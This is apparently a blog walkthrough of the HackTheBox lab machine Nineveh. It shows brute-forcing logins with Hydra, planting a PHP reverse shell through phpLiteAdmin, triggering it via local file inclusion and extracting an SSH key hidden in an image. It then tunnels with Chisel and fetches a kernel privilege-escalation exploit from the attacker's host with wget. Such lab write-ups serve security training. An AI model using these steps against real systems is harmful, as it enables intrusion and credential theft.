HackTheBox: Nineveh

The first step was to run Nmap against the Nineveh machine:

# Nmap 7.91 scan initiated Thu Dec 31 08:51:45 2020 as: nmap -oN scan -sC -O -sV -p- 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.042s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.12 (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%), Linux 4.2 (91%), Linux 4.4 (91%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 31 08:56:11 2020 -- 1 IP address (1 host up) scanned in 267.01 seconds

Both ports 80 and 443 appears to be open. I started by browsing to port 80and was presented with the following login page.

I ran Hydra against this login form to see if it had weak credentials:

┌──(root💀kali)-[/home/kali/Documents/nineveh]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^&Login=Login:invalid"   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-31 09:45:46
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^&Login=Login:invalid

[STATUS] 2618.00 tries/min, 2618 tries in 00:01h, 14341781 to do in 91:19h, 16 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-31 09:47:44

As you can see from the output, I used the RockYou wordlist and the password 1q2w3e4r5t was found for the username admin. I then logged into the admin panel.

The admin interface only contained a single page which included the following note:

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.
~amrois


This not was pulled from a text file stored on the webserver. This was evident by looking at the page URL and seeing the txt file ninevehNotes.txt included

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt

Because there was no more contents on this page for now, I decided to move onto the site hosted on port 443.

This page contains a single image. I ran GoBuster against this page and discovered the db directory:

┌──(root💀kali)-[/home/kali/Documents/nineveh]
└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt --url https://10.10.10.43/ -k                                 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.43/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/03 10:33:22 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/db (Status: 301)
/server-status (Status: 403)
===============================================================
2021/01/03 10:34:22 Finished
===============================================================

Browsing to this directory brings me to a phpLiteAdmin 1.9 login form.

I then ran Hydra against this login form and discovered password123 was being used.

┌──(root💀kali)-[/home/kali]
└─# hydra 10.10.10.43 https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -l admin -P /usr/share/wordlists/rockyou.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 10:55:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect


[443][http-post-form] host: 10.10.10.43   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-02 10:56:16

With this password i was successfully able to login to the phpLiteAdmin web interface. I discovered an exploit HERE which allows you to create a new database with a php extension, which you can then execute as remote code. I followed the instructions and created a database from the phpLiteAdmin web interface called test.php. I then opened the table and opened the insert tab and copied the code from /usr/share/webshells/php/ php-reverse-shell.php found by default in Kali. making sure to modify the IP address in the script to match my own. I then inserted this into the database.

By going back to the homepage we can see that the database file (test.php) is stored in /var/tmp/test.php

Now a method is needed to execute this file. I started by starting a netcast listner on port 1234 to capture the reverse shell:

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# nc -nvlp 1234        
listening on [any] 1234 ...

I went back to the page hosted on port 80 and modified the URL using directory traversal to execute /var/tmp/test.php rather than files/ninevehNotes.txt. by browsing to the following URL:

http://10.10.10.43/department/manage.php?notes=../../../../../../var/tmp/test.php

This however would not work and kept reporting “No Note is selected”. I did find however that if the filename ninevehNotes is included in the request then a different error is shown:

Warning:  include(files/ninevehNotes.tx): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31



Warning:  include(): Failed opening 'files/ninevehNotes.tx' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31

Because of this, I browsed back to the phpLiteAdmin interface and renamed the database to ninevehNotes.php. I then made a request to:

http://10.10.10.43/department/manage.php?notes=../../../../../../var/tmp/ninevehNotes.php

This worked successfully and a reverse shell was captured.

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# nc -nvlp 1234        
listening on [any] 1234 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.43] 49624
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 08:35:53 up  3:36,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

I did some browsing around the machine and found that there was a secure_notes folder in /var/www/ssl/secure_notes.

$ dir
index.html  nineveh.png
$ pwd
/var/www/ssl/secure_notes
$ 

This page contains the following image:

I downloaded this image to the kali machine with wget and ran strings against it.

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# strings nineveh.png  


-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar  
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

As you can see from the output, embedded in the image is a private RSA key. I extracted this key out of the file and saved it as nin.pub to be used later on.

I next did some more investigation through the reverse shell and found that it was listening on port 22, even though this wasn’t detected by the initial Nmap scan.

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.10.10.43:34960       10.10.14.19:1234        ESTABLISHED off (0.00/0/0)
tcp        0      0 10.10.10.43:443         10.10.14.19:59276       TIME_WAIT   timewait (51.58/0/0)
tcp        0      0 10.10.10.43:80          10.10.14.19:55812       ESTABLISHED keepalive (7203.23/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0 10.10.10.43:35020       1.1.1.1:53              ESTABLISHED off (0.00/0/0)
udp        0      0 10.10.10.43:47875       1.0.0.1:53              ESTABLISHED off (0.00/0/0)
Active UNIX domain sockets (servers and established)

I decided to forward this port to my Kali machine so it can be accessed and logged into using the previously captured private key.  I started a Chisel server on the kali machine:

┌──(root💀kali)-[/home/kali/Documents/nineveh]
└─# ./chisel_1.7.3_linux_amd64 server -p 2700 -reverse -v
2021/01/03 09:36:34 server: Reverse tunnelling enabled
2021/01/03 09:36:34 server: Fingerprint +Vgh/6RQNjjkwJCxTcS9GahcQIIBe9BrBOVhaMH9gZs=
2021/01/03 09:36:34 server: Listening on http://0.0.0.0:2700

I then downloaded the Chisel client to the Nineveh machine and executed that forwarded port 22 to my kali machine on port 2800:

$ ./chisel_1.7.3_linux_amd64 client 10.10.14.19:2700 R:2800:127.0.0.1:22
2021/01/03 08:36:14 client: Connecting to ws://10.10.14.19:2700
2021/01/03 08:36:40 client: Connected (Latency 26.49034ms)

I then logged into the fowarded SSH port from Kali using the nin.pub private key captured before:

┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes]
└─# ssh -i nin.pub amrois@127.0.0.1 -p 2800
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

287 packages can be updated.
206 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ ls
user.txt
amrois@nineveh:~$ cat user.txt 
[REDACTED]

As you can see, this was successful and was able to capture the user flag. The next step was to esclate privilages. By running “uname -r” I was able to identify the Linux kernel version as 4.4.0-62-generic. There is an exploit available for this kernel that allows privilage exclation. I downloaded the exploit to the Nineveh machine and ran it.

amrois@nineveh:/tmp$ wget http://10.10.14.19:8000/comp
--2021-01-03 09:21:39--  http://10.10.14.19:8000/comp
Connecting to 10.10.14.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: ‘comp’

comp                                                       100%[=======================================================================================================================================>]  17.46K  --.-KB/s    in 0.02s   

2021-01-03 09:21:39 (728 KB/s) - ‘comp’ saved [17880/17880]

amrois@nineveh:/tmp$ chmod +x comp
amrois@nineveh:/tmp$ ./comp
task_struct = ffff880039eb3800
uidptr = ffff88003c7f6d84
spawning root shell

root@nineveh:/tmp# cd /root/

root@nineveh:/root# cd Desktop

root@nineveh:/root# ls
root.txt  test.txt  vulnScan.sh

root@nineveh:/root# cat root.txt
[REDACTED]

As you can see from the output, this exploit was successful and I was able to capture the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *